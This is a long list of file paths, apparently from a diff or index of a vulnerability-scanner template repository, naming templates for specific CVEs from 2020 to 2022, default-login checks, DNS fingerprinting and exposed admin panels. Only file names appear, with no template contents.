-cves/2020/CVE-2020-4463.yaml -cves/2020/CVE-2020-5284.yaml -cves/2020/CVE-2020-5307.yaml -cves/2020/CVE-2020-5405.yaml -cves/2020/CVE-2020-5410.yaml -cves/2020/CVE-2020-5412.yaml -cves/2020/CVE-2020-5775.yaml -cves/2020/CVE-2020-5776.yaml -cves/2020/CVE-2020-5777.yaml -cves/2020/CVE-2020-5847.yaml -cves/2020/CVE-2020-5902.yaml -cves/2020/CVE-2020-6171.yaml -cves/2020/CVE-2020-6207.yaml -cves/2020/CVE-2020-6287.yaml -cves/2020/CVE-2020-6308.yaml -cves/2020/CVE-2020-6637.yaml -cves/2020/CVE-2020-7136.yaml -cves/2020/CVE-2020-7209.yaml -cves/2020/CVE-2020-7247.yaml -cves/2020/CVE-2020-7318.yaml -cves/2020/CVE-2020-7796.yaml -cves/2020/CVE-2020-7961.yaml -cves/2020/CVE-2020-8115.yaml -cves/2020/CVE-2020-8163.yaml -cves/2020/CVE-2020-8191.yaml -cves/2020/CVE-2020-8209.yaml -cves/2020/CVE-2020-8497.yaml -cves/2020/CVE-2020-8512.yaml -cves/2020/CVE-2020-8515.yaml -cves/2020/CVE-2020-8641.yaml -cves/2020/CVE-2020-8771.yaml -cves/2020/CVE-2020-8813.yaml -cves/2020/CVE-2020-9036.yaml -cves/2020/CVE-2020-9047.yaml -cves/2020/CVE-2020-9054.yaml -cves/2020/CVE-2020-9315.yaml -cves/2020/CVE-2020-9344.yaml -cves/2020/CVE-2020-9376.yaml -cves/2020/CVE-2020-9402.yaml -cves/2020/CVE-2020-9425.yaml -cves/2020/CVE-2020-9483.yaml -cves/2020/CVE-2020-9484.yaml -cves/2020/CVE-2020-9490.yaml -cves/2020/CVE-2020-9496.yaml -cves/2020/CVE-2020-9757.yaml -cves/2021/CVE-2021-1497.yaml -cves/2021/CVE-2021-1498.yaml -cves/2021/CVE-2021-1499.yaml -cves/2021/CVE-2021-20031.yaml -cves/2021/CVE-2021-20038.yaml -cves/2021/CVE-2021-20090.yaml -cves/2021/CVE-2021-20091.yaml -cves/2021/CVE-2021-20092.yaml -cves/2021/CVE-2021-20114.yaml -cves/2021/CVE-2021-20150.yaml -cves/2021/CVE-2021-20158.yaml -cves/2021/CVE-2021-20167.yaml -cves/2021/CVE-2021-20792.yaml -cves/2021/CVE-2021-20837.yaml -cves/2021/CVE-2021-21234.yaml -cves/2021/CVE-2021-21287.yaml -cves/2021/CVE-2021-21307.yaml -cves/2021/CVE-2021-21315.yaml -cves/2021/CVE-2021-21389.yaml -cves/2021/CVE-2021-21402.yaml -cves/2021/CVE-2021-21479.yaml -cves/2021/CVE-2021-21801.yaml -cves/2021/CVE-2021-21802.yaml -cves/2021/CVE-2021-21803.yaml -cves/2021/CVE-2021-21816.yaml -cves/2021/CVE-2021-21881.yaml -cves/2021/CVE-2021-21972.yaml -cves/2021/CVE-2021-21973.yaml -cves/2021/CVE-2021-21975.yaml -cves/2021/CVE-2021-21978.yaml -cves/2021/CVE-2021-21985.yaml -cves/2021/CVE-2021-22005.yaml -cves/2021/CVE-2021-22053.yaml -cves/2021/CVE-2021-22122.yaml -cves/2021/CVE-2021-22145.yaml -cves/2021/CVE-2021-22205.yaml -cves/2021/CVE-2021-22214.yaml -cves/2021/CVE-2021-22873.yaml -cves/2021/CVE-2021-22986.yaml -cves/2021/CVE-2021-23241.yaml -cves/2021/CVE-2021-24146.yaml -cves/2021/CVE-2021-24176.yaml -cves/2021/CVE-2021-24210.yaml -cves/2021/CVE-2021-24226.yaml -cves/2021/CVE-2021-24235.yaml -cves/2021/CVE-2021-24237.yaml -cves/2021/CVE-2021-24274.yaml -cves/2021/CVE-2021-24275.yaml -cves/2021/CVE-2021-24276.yaml -cves/2021/CVE-2021-24278.yaml -cves/2021/CVE-2021-24285.yaml -cves/2021/CVE-2021-24288.yaml -cves/2021/CVE-2021-24291.yaml -cves/2021/CVE-2021-24298.yaml -cves/2021/CVE-2021-24300.yaml -cves/2021/CVE-2021-24316.yaml -cves/2021/CVE-2021-24320.yaml -cves/2021/CVE-2021-24335.yaml -cves/2021/CVE-2021-24340.yaml -cves/2021/CVE-2021-24342.yaml -cves/2021/CVE-2021-24364.yaml -cves/2021/CVE-2021-24387.yaml -cves/2021/CVE-2021-24389.yaml -cves/2021/CVE-2021-24406.yaml -cves/2021/CVE-2021-24407.yaml -cves/2021/CVE-2021-24472.yaml -cves/2021/CVE-2021-24488.yaml -cves/2021/CVE-2021-24495.yaml -cves/2021/CVE-2021-24498.yaml -cves/2021/CVE-2021-24499.yaml -cves/2021/CVE-2021-24510.yaml -cves/2021/CVE-2021-24750.yaml -cves/2021/CVE-2021-24762.yaml -cves/2021/CVE-2021-24838.yaml -cves/2021/CVE-2021-24926.yaml -cves/2021/CVE-2021-24947.yaml -cves/2021/CVE-2021-24991.yaml -cves/2021/CVE-2021-24997.yaml -cves/2021/CVE-2021-25008.yaml -cves/2021/CVE-2021-25028.yaml -cves/2021/CVE-2021-25052.yaml -cves/2021/CVE-2021-25063.yaml -cves/2021/CVE-2021-25074.yaml -cves/2021/CVE-2021-25281.yaml -cves/2021/CVE-2021-25646.yaml -cves/2021/CVE-2021-25864.yaml -cves/2021/CVE-2021-26084.yaml -cves/2021/CVE-2021-26085.yaml -cves/2021/CVE-2021-26086.yaml -cves/2021/CVE-2021-26247.yaml -cves/2021/CVE-2021-26295.yaml -cves/2021/CVE-2021-26475.yaml -cves/2021/CVE-2021-26710.yaml -cves/2021/CVE-2021-26722.yaml -cves/2021/CVE-2021-26723.yaml -cves/2021/CVE-2021-26812.yaml -cves/2021/CVE-2021-26855.yaml -cves/2021/CVE-2021-27132.yaml -cves/2021/CVE-2021-27310.yaml -cves/2021/CVE-2021-27330.yaml -cves/2021/CVE-2021-27358.yaml -cves/2021/CVE-2021-27561.yaml -cves/2021/CVE-2021-27651.yaml -cves/2021/CVE-2021-27850.yaml -cves/2021/CVE-2021-27905.yaml -cves/2021/CVE-2021-27931.yaml -cves/2021/CVE-2021-28073.yaml -cves/2021/CVE-2021-28149.yaml -cves/2021/CVE-2021-28150.yaml -cves/2021/CVE-2021-28151.yaml -cves/2021/CVE-2021-28164.yaml -cves/2021/CVE-2021-28169.yaml -cves/2021/CVE-2021-28854.yaml -cves/2021/CVE-2021-28918.yaml -cves/2021/CVE-2021-28937.yaml -cves/2021/CVE-2021-29156.yaml -cves/2021/CVE-2021-29203.yaml -cves/2021/CVE-2021-29441.yaml -cves/2021/CVE-2021-29442.yaml -cves/2021/CVE-2021-29484.yaml -cves/2021/CVE-2021-29490.yaml -cves/2021/CVE-2021-29622.yaml -cves/2021/CVE-2021-29625.yaml -cves/2021/CVE-2021-30049.yaml -cves/2021/CVE-2021-30151.yaml -cves/2021/CVE-2021-3017.yaml -cves/2021/CVE-2021-3019.yaml -cves/2021/CVE-2021-30213.yaml -cves/2021/CVE-2021-30461.yaml -cves/2021/CVE-2021-30497.yaml -cves/2021/CVE-2021-31249.yaml -cves/2021/CVE-2021-31250.yaml -cves/2021/CVE-2021-3129.yaml -cves/2021/CVE-2021-31537.yaml -cves/2021/CVE-2021-31581.yaml -cves/2021/CVE-2021-31589.yaml -cves/2021/CVE-2021-31602.yaml -cves/2021/CVE-2021-31682.yaml -cves/2021/CVE-2021-31755.yaml -cves/2021/CVE-2021-31856.yaml -cves/2021/CVE-2021-31862.yaml -cves/2021/CVE-2021-32030.yaml -cves/2021/CVE-2021-32172.yaml -cves/2021/CVE-2021-3223.yaml -cves/2021/CVE-2021-32305.yaml -cves/2021/CVE-2021-32618.yaml -cves/2021/CVE-2021-32682.yaml -cves/2021/CVE-2021-32819.yaml -cves/2021/CVE-2021-32820.yaml -cves/2021/CVE-2021-32853.yaml -cves/2021/CVE-2021-3293.yaml -cves/2021/CVE-2021-3297.yaml -cves/2021/CVE-2021-33044.yaml -cves/2021/CVE-2021-33221.yaml -cves/2021/CVE-2021-33357.yaml -cves/2021/CVE-2021-33544.yaml -cves/2021/CVE-2021-33564.yaml -cves/2021/CVE-2021-3374.yaml -cves/2021/CVE-2021-3377.yaml -cves/2021/CVE-2021-3378.yaml -cves/2021/CVE-2021-33807.yaml -cves/2021/CVE-2021-33904.yaml -cves/2021/CVE-2021-34370.yaml -cves/2021/CVE-2021-34429.yaml -cves/2021/CVE-2021-34473.yaml -cves/2021/CVE-2021-34621.yaml -cves/2021/CVE-2021-34640.yaml -cves/2021/CVE-2021-34643.yaml -cves/2021/CVE-2021-35265.yaml -cves/2021/CVE-2021-35336.yaml -cves/2021/CVE-2021-35464.yaml -cves/2021/CVE-2021-3577.yaml -cves/2021/CVE-2021-36260.yaml -cves/2021/CVE-2021-36380.yaml -cves/2021/CVE-2021-3654.yaml -cves/2021/CVE-2021-36748.yaml -cves/2021/CVE-2021-36749.yaml -cves/2021/CVE-2021-37216.yaml -cves/2021/CVE-2021-37538.yaml -cves/2021/CVE-2021-37573.yaml -cves/2021/CVE-2021-37580.yaml -cves/2021/CVE-2021-37704.yaml -cves/2021/CVE-2021-37833.yaml -cves/2021/CVE-2021-38314.yaml -cves/2021/CVE-2021-38540.yaml -cves/2021/CVE-2021-38647.yaml -cves/2021/CVE-2021-38702.yaml -cves/2021/CVE-2021-38704.yaml -cves/2021/CVE-2021-38751.yaml -cves/2021/CVE-2021-39226.yaml -cves/2021/CVE-2021-39316.yaml -cves/2021/CVE-2021-39320.yaml -cves/2021/CVE-2021-39322.yaml -cves/2021/CVE-2021-39327.yaml -cves/2021/CVE-2021-39350.yaml -cves/2021/CVE-2021-39433.yaml -cves/2021/CVE-2021-39501.yaml -cves/2021/CVE-2021-40323.yaml -cves/2021/CVE-2021-40438.yaml -cves/2021/CVE-2021-40539.yaml -cves/2021/CVE-2021-40542.yaml -cves/2021/CVE-2021-40856.yaml -cves/2021/CVE-2021-40859.yaml -cves/2021/CVE-2021-40868.yaml -cves/2021/CVE-2021-40870.yaml -cves/2021/CVE-2021-40875.yaml -cves/2021/CVE-2021-40960.yaml -cves/2021/CVE-2021-40978.yaml -cves/2021/CVE-2021-41174.yaml -cves/2021/CVE-2021-41192.yaml -cves/2021/CVE-2021-41266.yaml -cves/2021/CVE-2021-41277.yaml -cves/2021/CVE-2021-41291.yaml -cves/2021/CVE-2021-41293.yaml -cves/2021/CVE-2021-41349.yaml -cves/2021/CVE-2021-41381.yaml -cves/2021/CVE-2021-41467.yaml -cves/2021/CVE-2021-41648.yaml -cves/2021/CVE-2021-41649.yaml -cves/2021/CVE-2021-41653.yaml -cves/2021/CVE-2021-41773.yaml -cves/2021/CVE-2021-41826.yaml -cves/2021/CVE-2021-41878.yaml -cves/2021/CVE-2021-4191.yaml -cves/2021/CVE-2021-41951.yaml -cves/2021/CVE-2021-42013.yaml -cves/2021/CVE-2021-42237.yaml -cves/2021/CVE-2021-42258.yaml -cves/2021/CVE-2021-42551.yaml -cves/2021/CVE-2021-42565.yaml -cves/2021/CVE-2021-42566.yaml -cves/2021/CVE-2021-42567.yaml -cves/2021/CVE-2021-43062.yaml -cves/2021/CVE-2021-43287.yaml -cves/2021/CVE-2021-43495.yaml -cves/2021/CVE-2021-43496.yaml -cves/2021/CVE-2021-43778.yaml -cves/2021/CVE-2021-43798.yaml -cves/2021/CVE-2021-43810.yaml -cves/2021/CVE-2021-44228.yaml -cves/2021/CVE-2021-44427.yaml -cves/2021/CVE-2021-44521.yaml -cves/2021/CVE-2021-44528.yaml -cves/2021/CVE-2021-44848.yaml -cves/2021/CVE-2021-45043.yaml -cves/2021/CVE-2021-45046.yaml -cves/2021/CVE-2021-45092.yaml -cves/2021/CVE-2021-45232.yaml -cves/2021/CVE-2021-45380.yaml -cves/2021/CVE-2021-46005.yaml -cves/2022/CVE-2022-0149.yaml -cves/2022/CVE-2022-0218.yaml -cves/2022/CVE-2022-0281.yaml -cves/2022/CVE-2022-0378.yaml -cves/2022/CVE-2022-0432.yaml -cves/2022/CVE-2022-0653.yaml -cves/2022/CVE-2022-0692.yaml -cves/2022/CVE-2022-21371.yaml -cves/2022/CVE-2022-22536.yaml -cves/2022/CVE-2022-22947.yaml -cves/2022/CVE-2022-23131.yaml -cves/2022/CVE-2022-23134.yaml -cves/2022/CVE-2022-23178.yaml -cves/2022/CVE-2022-23779.yaml -cves/2022/CVE-2022-23808.yaml -cves/2022/CVE-2022-23944.yaml -cves/2022/CVE-2022-24112.yaml -cves/2022/CVE-2022-24124.yaml -cves/2022/CVE-2022-24260.yaml -cves/2022/CVE-2022-25323.yaml -cves/2022/CVE-2022-25369.yaml -default-logins/UCMDB/ucmdb-default-login.yaml -default-logins/abb/cs141-default-login.yaml -default-logins/activemq/activemq-default-login.yaml -default-logins/aem/aem-default-login.yaml -default-logins/alibaba/canal-default-login.yaml -default-logins/alphaweb/alphaweb-default-login.yaml -default-logins/ambari/ambari-default-login.yaml -default-logins/apache/airflow-default-login.yaml -default-logins/apache/apisix-default-login.yaml -default-logins/apache/superset-default-login.yaml -default-logins/apache/tomcat-default-login.yaml -default-logins/arl/arl-default-login.yaml -default-logins/azkaban/azkaban-default-login.yaml -default-logins/chinaunicom/chinaunicom-default-login.yaml -default-logins/cobbler/cobbler-default-login.yaml -default-logins/dell/dell-idrac-default-login.yaml -default-logins/dell/dell-idrac9-default-login.yaml -default-logins/dell/emcecom-default-login.yaml -default-logins/digitalrebar/digitalrebar-default-login.yaml -default-logins/druid/druid-default-login.yaml -default-logins/dvwa/dvwa-default-login.yaml -default-logins/exacqvision/exacqvision-default-login.yaml -default-logins/flir/flir-default-login.yaml -default-logins/frps/frp-default-login.yaml -default-logins/gitlab/gitlab-weak-login.yaml -default-logins/glpi/glpi-default-login.yaml -default-logins/google/google-earth-dlogin.yaml -default-logins/gophish/gophish-default-login.yaml -default-logins/grafana/grafana-default-login.yaml -default-logins/guacamole/guacamole-default-login.yaml -default-logins/hongdian/hongdian-default-login.yaml -default-logins/hortonworks/smartsense-default-login.yaml -default-logins/hp/hp-switch-default-login.yaml -default-logins/huawei/huawei-HG532e-default-router-login.yaml -default-logins/ibm/ibm-mqseries-default-login.yaml -default-logins/ibm/ibm-storage-default-credential.yaml -default-logins/idemia/idemia-biometrics-default-login.yaml -default-logins/iptime/iptime-default-login.yaml -default-logins/jboss/jmx-default-login.yaml -default-logins/jenkins/jenkins-default.yaml -default-logins/kafka-center-default-login.yaml -default-logins/minio/minio-default-login.yaml -default-logins/mofi/mofi4500-default-login.yaml -default-logins/nagios/nagios-default-login.yaml -default-logins/netsus/netsus-default-login.yaml -default-logins/nexus/nexus-default-login.yaml -default-logins/nps/nps-default-login.yaml -default-logins/ofbiz/ofbiz-default-login.yaml -default-logins/oracle/businessintelligence-default-login.yaml -default-logins/paloalto/panos-default-login.yaml -default-logins/panabit/panabit-default-login.yaml -default-logins/pentaho/pentaho-default-login.yaml -default-logins/rabbitmq/rabbitmq-default-login.yaml -default-logins/rancher/rancher-default-login.yaml -default-logins/ricoh/ricoh-weak-password.yaml -default-logins/rockmongo/rockmongo-default-login.yaml -default-logins/rseenet/rseenet-default-login.yaml -default-logins/samsung/samsung-wlan-default-login.yaml -default-logins/seeddms/seeddms-default-login.yaml -default-logins/sequoiadb/sequoiadb-default-login.yaml -default-logins/showdoc/showdoc-default-login.yaml -default-logins/solarwinds/solarwinds-default-login.yaml -default-logins/spectracom/spectracom-default-login.yaml -default-logins/szhe/szhe-default-login.yaml -default-logins/versa/versa-default-login.yaml -default-logins/vidyo/vidyo-default-login.yaml -default-logins/viewpoint/trilithic-viewpoint-login.yaml -default-logins/visionhub/visionhub-default-login.yaml -default-logins/weblogic/weblogic-weak-login.yaml -default-logins/wifisky/wifisky-default-login.yaml -default-logins/wso2/wso2-default-login.yaml -default-logins/xerox/xerox7-default-login.yaml -default-logins/xxljob/xxljob-default-login.yaml -default-logins/zabbix/zabbix-default-login.yaml -default-logins/zmanda/zmanda-default-login.yaml -dns/cname-fingerprint.yaml -dns/cname-service-detection.yaml -dns/detect-dangling-cname.yaml -dns/dns-waf-detect.yaml -dns/dnssec-detection.yaml -dns/ec2-detection.yaml -dns/elasticbeantalk-takeover.yaml -dns/mx-fingerprint.yaml -dns/mx-service-detector.yaml -dns/nameserver-fingerprint.yaml -dns/ptr-fingerprint.yaml -dns/spoofable-spf-records-ptr.yaml -dns/txt-fingerprint.yaml -dns/worksites-detection.yaml -exposed-panels/3g-wireless-gateway.yaml -exposed-panels/acemanager-login.yaml -exposed-panels/acrolinx-dashboard.yaml -exposed-panels/active-admin-exposure.yaml -exposed-panels/activemq-panel.yaml -exposed-panels/acunetix-panel.yaml -exposed-panels/adiscon-loganalyzer.yaml -exposed-panels/adminer-panel.yaml -exposed-panels/adminset-panel.yaml -exposed-panels/adobe/adobe-component-login.yaml -exposed-panels/adobe/adobe-connect-central-login.yaml -exposed-panels/adobe/adobe-experience-manager-login.yaml -exposed-panels/adobe/adobe-media-server.yaml -exposed-panels/advance-setup.yaml -exposed-panels/aerohive-netconfig-ui.yaml -exposed-panels/aims-password-mgmt-client.yaml -exposed-panels/aims-password-portal.yaml -exposed-panels/airflow-panel.yaml -exposed-panels/akamai-cloudtest.yaml -exposed-panels/alfresco-detect.yaml -exposed-panels/alienvault-usm.yaml -exposed-panels/ambari-exposure.yaml -exposed-panels/amcrest-login.yaml -exposed-panels/ametys-admin-login.yaml -exposed-panels/ampps-admin-panel.yaml -exposed-panels/ampps-panel.yaml -exposed-panels/ansible-tower-exposure.yaml -exposed-panels/apache/apache-apisix-panel.yaml -exposed-panels/apache/tomcat-pathnormalization.yaml -exposed-panels/apiman-panel.yaml -exposed-panels/argocd-login.yaml -exposed-panels/atvise-login.yaml -exposed-panels/avantfax-panel.yaml -exposed-panels/aviatrix-panel.yaml -exposed-panels/avtech-dvr-exposure.yaml -exposed-panels/axigen-webadmin.yaml -exposed-panels/axigen-webmail.yaml -exposed-panels/azkaban-web-client.yaml -exposed-panels/barracuda-panel.yaml -exposed-panels/bazarr-login.yaml -exposed-panels/bedita-panel.yaml -exposed-panels/bigbluebutton-login.yaml -exposed-panels/bitrix-panel.yaml -exposed-panels/blue-iris-login.yaml -exposed-panels/bmc-panel-detect.yaml -exposed-panels/bolt-cms-panel.yaml -exposed-panels/bomgar-login-panel.yaml -exposed-panels/bookstack-panel.yaml -exposed-panels/cacti-panel.yaml -exposed-panels/calendarix-panel.yaml -exposed-panels/call-break-cms.yaml -exposed-panels/camunda-login-panel.yaml -exposed-panels/cas-login.yaml -exposed-panels/casdoor-login.yaml -exposed-panels/casemanager-panel.yaml -exposed-panels/centreon-panel.yaml -exposed-panels/cerebro-panel.yaml -exposed-panels/checkmarx-panel.yaml -exposed-panels/checkmk-login.yaml -exposed-panels/checkpoint-panel.yaml -exposed-panels/circarlife-setup.yaml -exposed-panels/cisco/cisco-ace-device-manager.yaml -exposed-panels/cisco/cisco-edge-340.yaml -exposed-panels/cisco/cisco-finesse-login.yaml -exposed-panels/cisco/cisco-integrated-login.yaml -exposed-panels/cisco/cisco-meraki-exposure.yaml -exposed-panels/cisco/cisco-prime-infrastructure.yaml -exposed-panels/cisco/cisco-sd-wan.yaml -exposed-panels/cisco/cisco-secure-cn.yaml -exposed-panels/cisco/cisco-secure-desktop.yaml -exposed-panels/cisco/cisco-sendgrid.yaml -exposed-panels/cisco/cisco-systems-login.yaml -exposed-panels/cisco/cisco-telepresence.yaml -exposed-panels/cisco/cisco-ucs-kvm-login.yaml -exposed-panels/clave-login-panel.yaml -exposed-panels/clearpass-policy-manager.yaml -exposed-panels/cloudphysician-radar.yaml -exposed-panels/cobbler-webgui.yaml -exposed-panels/code42-panel.yaml -exposed-panels/codemeter-webadmin-panel.yaml -exposed-panels/coldfusion-administrator-login.yaml -exposed-panels/concrete5/concrete5-install.yaml -exposed-panels/concrete5/concrete5-panel.yaml -exposed-panels/contentkeeper-detect.yaml -exposed-panels/cortex-xsoar-login.yaml -exposed-panels/couchdb-fauxton.yaml -exposed-panels/craftcms-admin-panel.yaml -exposed-panels/crush-ftp-login.yaml -exposed-panels/csod-panel.yaml -exposed-panels/cwp-webpanel.yaml -exposed-panels/cx-cloud-login.yaml -exposed-panels/d-link-wireless.yaml -exposed-panels/daybyday-panel.yaml -exposed-panels/defectdojo-panel.yaml -exposed-panels/dell-openmanager-login.yaml -exposed-panels/dell-wyse-login.yaml -exposed-panels/dericam-login.yaml -exposed-panels/digitalrebar-login.yaml -exposed-panels/directum-login.yaml -exposed-panels/django-admin-panel.yaml -exposed-panels/dolibarr-panel.yaml -exposed-panels/dotclear-panel.yaml -exposed-panels/dotcms-admin-panel.yaml -exposed-panels/druid-console-exposure.yaml -exposed-panels/druid-panel.yaml -exposed-panels/drupal-login.yaml -exposed-panels/dynamicweb-panel.yaml -exposed-panels/ecosys-command-center.yaml -exposed-panels/edgeos-login.yaml -exposed-panels/emerson-power-panel.yaml -exposed-panels/emessage-panel.yaml -exposed-panels/ems-login-panel.yaml -exposed-panels/ems-webclient-panel.yaml -exposed-panels/entrust-identityguard.yaml -exposed-panels/epson-access-detect.yaml -exposed-panels/epson-projector-detect.yaml -exposed-panels/epson-web-control-detect.yaml -exposed-panels/exposed-nomad.yaml -exposed-panels/exposed-webalizer.yaml -exposed-panels/exsi-system.yaml -exposed-panels/extreme-netconfig-ui.yaml -exposed-panels/f-secure-policy-manager.yaml -exposed-panels/faraday-login.yaml -exposed-panels/fastapi-docs.yaml -exposed-panels/fatpipe-ipvpn-panel.yaml -exposed-panels/fatpipe-mpvpn-panel.yaml -exposed-panels/fatpipe-warp-panel.yaml -exposed-panels/fiorilaunchpad-logon.yaml -exposed-panels/fireware-xtm-user-authentication.yaml -exposed-panels/flightpath-panel.yaml -exposed-panels/flink-exposure.yaml -exposed-panels/forcepoint-applicance.yaml -exposed-panels/forcepoint.yaml -exposed-panels/fortimail-panel.yaml -exposed-panels/fortinet-panel.yaml -exposed-panels/fortiweb-panel.yaml -exposed-panels/gerapy-detect.yaml -exposed-panels/gespage-panel.yaml -exposed-panels/getsimple-installation.yaml -exposed-panels/gitea-login.yaml -exposed-panels/gitlab-detect.yaml -exposed-panels/glpi-authentication.yaml -exposed-panels/glpi-login.yaml -exposed-panels/glpi-panel.yaml -exposed-panels/go-anywhere-client.yaml -exposed-panels/gocd-login.yaml -exposed-panels/gocron-panel.yaml -exposed-panels/gogs-login.yaml -exposed-panels/gophish-login.yaml -exposed-panels/grails-database-admin-console.yaml -exposed-panels/graphite-browser.yaml -exposed-panels/h2console-panel.yaml -exposed-panels/hadoop-exposure.yaml -exposed-panels/hashicorp-consul-agent.yaml -exposed-panels/hashicorp-consul-webgui.yaml -exposed-panels/hitron-technologies.yaml -exposed-panels/hivemanager-login-panel.yaml -exposed-panels/hmc-hybris-panel.yaml -exposed-panels/homematic-panel.yaml -exposed-panels/honeywell-web-controller.yaml -exposed-panels/hp-ilo-5.yaml -exposed-panels/hp-service-manager.yaml -exposed-panels/hp-virtual-connect-manager.yaml -exposed-panels/hpe-system-management-login.yaml -exposed-panels/ibm/ibm-advanced-system-management.yaml -exposed-panels/ibm/ibm-mqseries-web-console.yaml -exposed-panels/ibm/ibm-note-login.yaml -exposed-panels/ibm/ibm-security-access-manager.yaml -exposed-panels/ibm/ibm-service-assistant.yaml -exposed-panels/ibm/ibm-websphere-panel.yaml -exposed-panels/icinga-web-login.yaml -exposed-panels/identity-services-engine.yaml -exposed-panels/intelbras-login.yaml -exposed-panels/iomega-emc-shared-nas.yaml -exposed-panels/iptime-router.yaml -exposed-panels/issabel-login.yaml -exposed-panels/itop-panel.yaml -exposed-panels/ixcache-panel.yaml -exposed-panels/jamf-panel.yaml -exposed-panels/jaspersoft-panel.yaml -exposed-panels/jeedom-panel.yaml -exposed-panels/jenkins-api-panel.yaml -exposed-panels/jenkins-login.yaml -exposed-panels/jfrog.yaml -exposed-panels/joomla-panel.yaml -exposed-panels/kafka-center-login.yaml -exposed-panels/kafka-connect-ui.yaml -exposed-panels/kafka-consumer-monitor.yaml -exposed-panels/kafka-monitoring.yaml -exposed-panels/kafka-topics-ui.yaml -exposed-panels/keenetic-web-login.yaml -exposed-panels/kenesto-login.yaml -exposed-panels/kerio-connect-client.yaml -exposed-panels/key-cloak-admin-panel.yaml -exposed-panels/kibana-panel.yaml -exposed-panels/kronos-workforce-central.yaml -exposed-panels/kubernetes-dashboard.yaml -exposed-panels/labtech-panel.yaml -exposed-panels/lacie-panel.yaml -exposed-panels/landrayoa-panel.yaml -exposed-panels/lansweeper-login.yaml -exposed-panels/librenms-login.yaml -exposed-panels/linksys-wifi-login.yaml -exposed-panels/livezilla-login-panel.yaml -exposed-panels/lucee-login.yaml -exposed-panels/luci-login-detection.yaml -exposed-panels/magento-admin-panel.yaml -exposed-panels/mantis-detect.yaml -exposed-panels/mautic-crm-panel.yaml -exposed-panels/meshcentral-login.yaml -exposed-panels/metabase-panel.yaml -exposed-panels/metersphere-login.yaml -exposed-panels/microsoft-exchange-panel.yaml -exposed-panels/mikrotik-routeros.yaml -exposed-panels/mini-start-page.yaml -exposed-panels/minio-browser.yaml -exposed-panels/minio-console.yaml -exposed-panels/mobileiron-login.yaml -exposed-panels/mongodb-ops-manager.yaml -exposed-panels/monitorix-exposure.yaml -exposed-panels/movable-type-login.yaml -exposed-panels/ms-adcs-detect.yaml -exposed-panels/neos-panel.yaml -exposed-panels/nessus-panel.yaml -exposed-panels/netdata-dashboard-detected.yaml -exposed-panels/netflix-conductor-ui.yaml -exposed-panels/netgear-version-detect.yaml -exposed-panels/netis-router.yaml -exposed-panels/netlify-cms.yaml -exposed-panels/netscaler-aaa-login.yaml -exposed-panels/netscaler-gateway.yaml -exposed-panels/netsus-server-login.yaml -exposed-panels/nginx-proxy-manager.yaml -exposed-panels/nutanix-web-console-login.yaml -exposed-panels/ocs-inventory-login.yaml -exposed-panels/octoprint-login.yaml -exposed-panels/odoo-database-manager.yaml -exposed-panels/oipm-detect.yaml -exposed-panels/oki-data.yaml -exposed-panels/okiko-sfiler-portal.yaml -exposed-panels/okta-panel.yaml -exposed-panels/open-game-panel.yaml -exposed-panels/open-stack-dashboard-login.yaml -exposed-panels/openam-panel.yaml -exposed-panels/openbmcs-detect.yaml -exposed-panels/opencast-detect.yaml -exposed-panels/openemr-detect.yaml -exposed-panels/openerp-database.yaml -exposed-panels/opengear-login.yaml -exposed-panels/opennms-web-console.yaml -exposed-panels/opensis-panel.yaml -exposed-panels/openvpn-monitor.yaml -exposed-panels/openx-panel.yaml -exposed-panels/oracle-business-control.yaml -exposed-panels/oracle-integrated-manager.yaml -exposed-panels/oracle-people-enterprise.yaml -exposed-panels/oracle-people-sign-in.yaml -exposed-panels/otobo-panel.yaml -exposed-panels/pacs-connexion-utilisateur.yaml -exposed-panels/pagespeed-global-admin.yaml -exposed-panels/panabit-panel.yaml -exposed-panels/pandora-fms-console.yaml -exposed-panels/pentaho-panel.yaml -exposed-panels/pgadmin-exposure.yaml -exposed-panels/phabricator-login.yaml -exposed-panels/phoronix-pane;.yaml -exposed-panels/phpcollab-panel.yaml -exposed-panels/phppgadmin-panel.yaml -exposed-panels/plastic-scm-login.yaml -exposed-panels/plesk-obsidian.yaml -exposed-panels/plesk-onyx.yaml -exposed-panels/polycom-admin-detect.yaml -exposed-panels/polycom-login.yaml -exposed-panels/portainer-init-deploy.yaml -exposed-panels/powerlogic-ion.yaml -exposed-panels/project-insight-login.yaml -exposed-panels/projectsend-login.yaml -exposed-panels/prometheus-exposed-panel.yaml -exposed-panels/pulse-secure-version.yaml -exposed-panels/pure-storage-login.yaml -exposed-panels/pypicloud-panel.yaml -exposed-panels/qualcomm-voip-router.yaml -exposed-panels/r-webserver-login.yaml -exposed-panels/radius-manager.yaml -exposed-panels/rancher-panel.yaml -exposed-panels/raspberrymatic-panel.yaml -exposed-panels/redash-panel.yaml -exposed-panels/redis-commander-exposure.yaml -exposed-panels/remkon-manager-panel.yaml -exposed-panels/remote-ui-login.yaml -exposed-panels/rocketmq-console-exposure.yaml -exposed-panels/rsa-self-service.yaml -exposed-panels/rstudio-detect.yaml -exposed-panels/saferoads-vms-login.yaml -exposed-panels/sage-panel.yaml -exposed-panels/samba-swat-panel.yaml -exposed-panels/samsung-printer-detect.yaml -exposed-panels/sap-hana-xsengine-panel.yaml -exposed-panels/sapfiori-panel.yaml -exposed-panels/sauter-login.yaml -exposed-panels/scs-landfill-control.yaml -exposed-panels/seats-login.yaml -exposed-panels/secmail-detect.yaml -exposed-panels/secure-login-panel.yaml -exposed-panels/securenvoy-panel.yaml -exposed-panels/securepoint-utm.yaml -exposed-panels/securityspy-detect.yaml -exposed-panels/seeddms-panel.yaml -exposed-panels/selenoid-ui-exposure.yaml -exposed-panels/sequoiadb-login.yaml -exposed-panels/server-backup-login.yaml -exposed-panels/server-backup-manager-se.yaml -exposed-panels/servicedesk-login-panel.yaml -exposed-panels/setup-page-exposure.yaml -exposed-panels/sgp-login-panel.yaml -exposed-panels/sharecenter-login.yaml -exposed-panels/shoutcast-server.yaml -exposed-panels/sidekiq-dashboard.yaml -exposed-panels/sitecore-login-panel.yaml -exposed-panels/sitecore-login.yaml -exposed-panels/sitefinity-login.yaml -exposed-panels/siteomat-login.yaml -exposed-panels/skycaiji-admin-panel.yaml -exposed-panels/slocum-login.yaml -exposed-panels/solarwinds-orion.yaml -exposed-panels/solarwinds-servuftp-detect.yaml -exposed-panels/solr-exposure.yaml -exposed-panels/somfy-login.yaml -exposed-panels/sonarqube-login.yaml -exposed-panels/sonicwall-management-panel.yaml -exposed-panels/sonicwall-sslvpn-panel.yaml -exposed-panels/sphider-login.yaml -exposed-panels/splunk-login.yaml -exposed-panels/sql-monitor.yaml -exposed-panels/squirrelmail-login.yaml -exposed-panels/strapi-documentation.yaml 